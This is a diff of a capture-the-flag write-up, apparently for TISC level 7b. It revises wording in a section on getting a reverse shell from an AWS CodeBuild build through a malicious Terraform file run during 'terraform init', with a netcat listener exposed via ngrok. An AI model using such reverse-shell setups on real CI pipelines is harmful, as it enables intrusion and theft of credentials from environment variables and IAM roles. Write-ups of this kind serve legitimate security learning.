rizemon/rizemon.github.io/_posts/2023-10-05-tisc-level7b.markdown

     }
     ```

-Based on these details, getting a shell on the build was paramount as doing so would allow for the access to the first part of the flag (which can be read via the environment variables) and access to the `codebuild-role` role (which had the `ec2:DescribeInstance*` permissions).
+Based on these details, getting a shell on the build was paramount as doing so would have allowed for the access to the first part of the flag (which can be read via the environment variables) and access to the `codebuild-role` role (which had the `ec2:DescribeInstance*` permissions).

 Based on the `buildspec` earlier, it performs a `terraform init`.
-Hence, the first step would be to create a malicious Terraform file that would spawn a reverse shell when `terraform init` is performed, which is referenced from https://cloud.hacktricks.xyz/pentesting-ci-cd/terraform-security#terraform-plan.
+Hence, the first step would be to create a malicious Terraform file that would spawn a reverse shell when the `terraform init` command is executed.
+(See https://cloud.hacktricks.xyz/pentesting-ci-cd/terraform-security#terraform-plan)

-A listener is created like so:
+A listener was created like so:

 ```bash
 $ nc -lvnp 1337
 listening on [any] 1337 ...
 ```

-And then the listener is made publicly reachable using `ngrok`:
+And the listener was made publicly reachable using `ngrok`:

 ```bash
 $ ngrok tcp 1337